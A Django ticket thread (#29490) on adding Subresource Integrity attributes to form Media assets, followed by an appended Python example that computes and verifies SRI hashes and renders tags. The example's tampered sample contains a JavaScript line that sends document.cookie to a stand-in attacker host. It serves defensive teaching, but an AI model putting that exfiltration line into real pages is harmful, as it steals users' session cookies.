[Django] #29490: Subresource integrity for form assets


Django

Jun 13, 2018, 10:26:40 AM
to django-...@googlegroups.com
#29490: Subresource integrity for form assets
---------------------------------------+------------------------
Reporter: Meiyer | Owner: nobody
Type: New feature | Status: new
Component: Forms | Version: master
Severity: Normal | Keywords:
Triage Stage: Unreviewed | Has patch: 0
Needs documentation: 0 | Needs tests: 0
Patch needs improvement: 0 | Easy pickings: 0
UI/UX: 0 |
---------------------------------------+------------------------
[https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity SRI] gives the web site author
some guarantees that an external resource (typically, a script), included
within the web page, has not been altered. For example, various external
libraries are loaded from a CDN or another third-party repository,
implicitly trusting that repository’s security, but these libraries can
be modified or tampered with to include malicious code, with the web site
author not aware that this malicious code is now running on their web site
in the context of their own web application. SRI prevents the loading of
such resources if they were modified.

SRI is implemented by means of the “integrity” attribute on the
`<LINK>` and `<SCRIPT>` HTML elements. It is relevant to Django, because
the form assets (“Media”) may point to resources on external repositories.
But Django does not allow any way to specify the
[https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity#Using_Subresource_Integrity “integrity” attribute]
(and the [https://developer.mozilla.org/en-US/docs/Web/HTML/CORS_settings_attributes “crossorigin” attribute])
for the assets of the forms.

I suggest modifying the `Media`
[https://docs.djangoproject.com/en/2.0/topics/forms/media/#assets-as-a-static-definition class definitions]
such that the assets are not a simple list but a `dict` (with keys such as
`src`, `integrity`, `crossorigin`), resulting in corresponding HTML elements
being rendered appropriately. There can be a fallback to the simpler case
when a `list` or `tuple` is provided, for backwards-compatibility.

--
Ticket URL: <https://code.djangoproject.com/ticket/29490>
Django <https://code.djangoproject.com/>
The Web framework for perfectionists with deadlines.

Django

Jun 13, 2018, 3:54:53 PM
to django-...@googlegroups.com
#29490: Subresource integrity for form assets
-----------------------------+------------------------------------
Reporter: Meiyer | Owner: nobody
Type: New feature | Status: new
Component: Forms | Version: master
Severity: Normal | Resolution:
Keywords: | Triage Stage: Accepted
Has patch: 0 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
-----------------------------+------------------------------------
Changes (by Claude Paroz):

* stage: Unreviewed => Accepted


--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:1>

Django

Jun 18, 2018, 10:38:07 AM
to django-...@googlegroups.com
#29490: Subresource integrity for form assets
-----------------------------+------------------------------------
Reporter: Meiyer | Owner: nobody
Type: New feature | Status: new
Component: Forms | Version: master
Severity: Normal | Resolution:
Keywords: | Triage Stage: Accepted
Has patch: 0 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
-----------------------------+------------------------------------

Comment (by Tim Graham):

I'd say maybe. There's also some thought in #22298 to deprecate the
`Media` class.

--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:2>

Django

Aug 22, 2018, 6:02:07 AM
to django-...@googlegroups.com
#29490: Subresource integrity for form assets
-----------------------------+------------------------------------
Reporter: Meiyer | Owner: nobody
Type: New feature | Status: new
Component: Forms | Version: master
Severity: Normal | Resolution:
Keywords: | Triage Stage: Accepted
Has patch: 0 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
-----------------------------+------------------------------------

Comment (by Claude Paroz):

Based on what I suggested in #29586 and
[https://groups.google.com/forum/#!msg/django-developers/KYmNnvwXDUI/5zfPx27OBwAJ this discussion],
here's what could be a possible implementation (still WIP):
https://github.com/claudep/django/commit/89aa4c04dbffcbafc05c3e2053b2262be8de4d3d

Considering it was suggested the original proposal should be first
implemented as a 3rd party app, I don't want to go further without a green
light for integrating such an implementation to Django.

--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:3>

Django

Jan 22, 2022, 11:31:27 AM
to django-...@googlegroups.com
#29490: Subresource integrity for form assets
-----------------------------+------------------------------------
Reporter: Meiyer | Owner: nobody
Type: New feature | Status: new
Component: Forms | Version: dev
Severity: Normal | Resolution:
Keywords: | Triage Stage: Accepted
Has patch: 1 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
-----------------------------+------------------------------------
Changes (by Claude Paroz):

* has_patch: 0 => 1


Comment:

In this [https://github.com/django/django/pull/15349 new PR], I tried
adding the minimal possible support in Django to allow for some custom
rendering of form media. This would allow people to add basic support for
custom attributes, as demonstrated by the implementation supporting
`integrity` in tests.

--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:4>

Django

Jan 24, 2022, 12:42:30 AM
to django-...@googlegroups.com
#29490: Subresource integrity for form assets
-----------------------------+----------------------------------------
Reporter: Meiyer | Owner: Claude Paroz
Type: New feature | Status: assigned
Component: Forms | Version: dev
Severity: Normal | Resolution:
Keywords: | Triage Stage: Accepted
Has patch: 1 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
-----------------------------+----------------------------------------
Changes (by Mariusz Felisiak):

* owner: nobody => Claude Paroz
* status: new => assigned


--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:5>

Django

Feb 10, 2022, 1:56:17 AM
to django-...@googlegroups.com
#29490: Subresource integrity for form assets
-----------------------------+---------------------------------------------
Reporter: Meiyer | Owner: Claude Paroz
Type: New feature | Status: assigned
Component: Forms | Version: dev
Severity: Normal | Resolution:
Keywords: | Triage Stage: Ready for checkin
Has patch: 1 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
-----------------------------+---------------------------------------------
Changes (by Mariusz Felisiak):

* stage: Accepted => Ready for checkin


--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:6>

Django

Feb 10, 2022, 3:37:17 AM
to django-...@googlegroups.com
#29490: Subresource integrity for form assets
-----------------------------+---------------------------------------------
Reporter: Meiyer | Owner: Claude Paroz
Type: New feature | Status: closed
Component: Forms | Version: dev
Severity: Normal | Resolution: fixed
Keywords: | Triage Stage: Ready for checkin
Has patch: 1 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
-----------------------------+---------------------------------------------
Changes (by Mariusz Felisiak <felisiak.mariusz@…>):

* status: assigned => closed
* resolution: => fixed


Comment:

In [changeset:"4c76ffc2d6c77c850b4bef8d9acc197d11c47937" 4c76ffc2]:
{{{
#!CommitTicketReference repository=""
revision="4c76ffc2d6c77c850b4bef8d9acc197d11c47937"
Fixed #29490 -- Added support for object-based Media CSS and JS paths.
}}}

--
Ticket URL: <https://code.djangoproject.com/ticket/29490#comment:7>
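As an added example (not code from the ticket, from Django, or from any of the posters above), the following Python shows both halves of what the thread is about: computing a Subresource Integrity value for an asset and checking it the way a browser does (strongest listed algorithm wins, unknown algorithms are ignored), and rendering a `<script>`/`<link>` tag that carries `integrity` and `crossorigin` as an object with an `__html__` method, which is the form that the 4c76ffc2 change (object-based Media paths, Django 4.1) hands through to the page verbatim instead of building the tag itself. `sri_hash`, `verify_integrity`, `SriScript`, `SriStylesheet`, `render_media`, the sample library bytes and the CDN hostname are all assumptions of this example, not Django APIs; it runs without Django installed.

```python
"""Added example: SRI tokens for Django form Media entries (not Django's code)."""
import base64
import hashlib
from html import escape

# Strongest-first order; browsers keep only the strongest algorithm
# present in an integrity attribute and ignore any they do not know.
_ALGORITHMS = ("sha512", "sha384", "sha256")


def sri_hash(data: bytes, algorithm: str = "sha384") -> str:
    """Return an integrity token such as 'sha384-<base64 digest>'."""
    if algorithm not in _ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algorithm}")
    digest = hashlib.new(algorithm, data).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def verify_integrity(data: bytes, integrity: str) -> bool:
    """Browser-style check of `data` against an integrity attribute value.

    Tokens with unknown algorithms are dropped; if nothing parseable is
    left the attribute imposes no constraint (the resource loads), which
    is why a typo in the algorithm name silently disables SRI.
    """
    parsed = []
    for token in integrity.split():
        algorithm, _, value = token.partition("-")
        value = value.split("?", 1)[0]  # options after '?' are ignored
        if algorithm in _ALGORITHMS and value:
            parsed.append((algorithm, value))
    if not parsed:
        return True
    strongest = min(parsed, key=lambda p: _ALGORITHMS.index(p[0]))[0]
    accepted = {value for algorithm, value in parsed if algorithm == strongest}
    actual = sri_hash(data, strongest).split("-", 1)[1]
    return actual in accepted


class SriAsset:
    """Media entry rendered through __html__ (what Django 4.1+ Media calls).

    crossorigin is required: without CORS the browser cannot compare the
    digest of an opaque cross-origin response, so SRI does not apply.
    """

    template = ""

    def __init__(self, src: str, integrity: str, crossorigin: str = "anonymous"):
        self.src = src
        self.integrity = integrity
        self.crossorigin = crossorigin

    def __html__(self) -> str:
        # Escape every attribute so a hostile path cannot break out of the tag.
        return self.template.format(
            src=escape(self.src, quote=True),
            integrity=escape(self.integrity, quote=True),
            crossorigin=escape(self.crossorigin, quote=True),
        )

    __str__ = __html__


class SriScript(SriAsset):
    template = '<script src="{src}" integrity="{integrity}" crossorigin="{crossorigin}"></script>'


class SriStylesheet(SriAsset):
    template = '<link href="{src}" rel="stylesheet" integrity="{integrity}" crossorigin="{crossorigin}">'


def render_media(assets) -> str:
    """Stand-in for Media.render_js/render_css: object entries render via __html__."""
    return "\n".join(asset.__html__() for asset in assets)


# Constructed sample: a pretend third-party library, and a tampered copy
# with an exfiltration call appended (hostname is reserved, never resolves).
LIBRARY_JS = b"window.widget = function () { return 42; };\n"
TAMPERED_JS = LIBRARY_JS + b"fetch('https://attacker.invalid/?c=' + document.cookie);\n"


def demo() -> dict:
    integrity = sri_hash(LIBRARY_JS)  # pin the hash of the version you reviewed
    # In a real project the object goes straight into a form or widget:
    #   class Media:
    #       js = [SriScript("https://cdn.example.invalid/widget.js", integrity)]
    script = SriScript("https://cdn.example.invalid/widget.js", integrity)
    return {
        "tag": render_media([script]),
        "genuine_ok": verify_integrity(LIBRARY_JS, integrity),
        "tampered_ok": verify_integrity(TAMPERED_JS, integrity),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note what the check does and does not buy you: the pinned digest blocks a silently modified CDN copy, but every library upgrade means regenerating the token from bytes you have actually reviewed, and a malformed algorithm name leaves the attribute inert rather than failing closed.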
